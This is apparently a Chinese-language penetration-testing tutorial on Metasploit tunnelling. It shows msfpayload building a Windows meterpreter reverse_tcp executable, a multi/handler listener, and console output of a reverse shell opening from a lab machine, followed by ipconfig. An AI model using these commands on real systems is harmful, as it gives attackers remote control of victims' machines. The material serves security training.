前言
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击测试。它本身附带数百个已知软件漏洞的专业级漏洞攻击测试工具。
当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来测试那些未打过补丁或者刚刚打过补丁的漏洞。
正是因为Metasploit团队一直都在努力开发各种攻击测试工具,并将它们贡献给所有Metasploit用户,软件厂商再也不能推迟发布针对已公布漏洞的补丁了。
本文将科普下metasploit隧道代理的使用技巧。
0×00 获取meterpreter
1.首先生成可执行文件
root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.101.105 LPORT=444 X > meter.exe
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 281
Options: {"LHOST"=>"192.168.101.105", "LPORT"=>"444"}
2.启动msfconsole,监听反连端口
root@kali:~# msfconsole [*] Starting the Metasploit Framework console.../ Taking notes in notepad? Have Metasploit Pro track & report your progress and findings -- learn more on http://rapid7.com/metasploit =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]] + -- --=[ 1386 exploits - 863 auxiliary - 236 post ] + -- --=[ 342 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 0.0.0.0 LHOST => 0.0.0.0 msf exploit(handler) > set LPORT 444 LPORT => 444 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LHOST 0.0.0.0 yes The listen address LPORT 444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > run [*] Started reverse handler on 0.0.0.0:444 [*] Starting the payload handler... 3.在xp-test1执行meter.exe,attacker获得 meterperter msf exploit(handler) > run [*] Started reverse handler on 0.0.0.0:444 [*] Starting the payload handler... [*] Sending stage (770048 bytes) to 192.168.101.107 [*] Meterpreter session 1 opened (192.168.101.105:444 -> 192.168.101.107:48019) at 2015-01-11 12:49:11 +0800 meterpreter > ipconfig Interface 1 ============ Name : MS TCP Loopback interface Hardware MAC : 00:00:00:00:00:00 MTU : 1520 IPv4 Address : 127.0.0.1 Interface 2 ============ Name : AMD PCNET Family PCI Ethernet Adapter - pencS Hardware MAC : 00:0c:29:ed:cf:d0 MTU : 1500 IPv4 Address : 10.1.1.128 IPv4 Netmask : 255.255.255.0 |
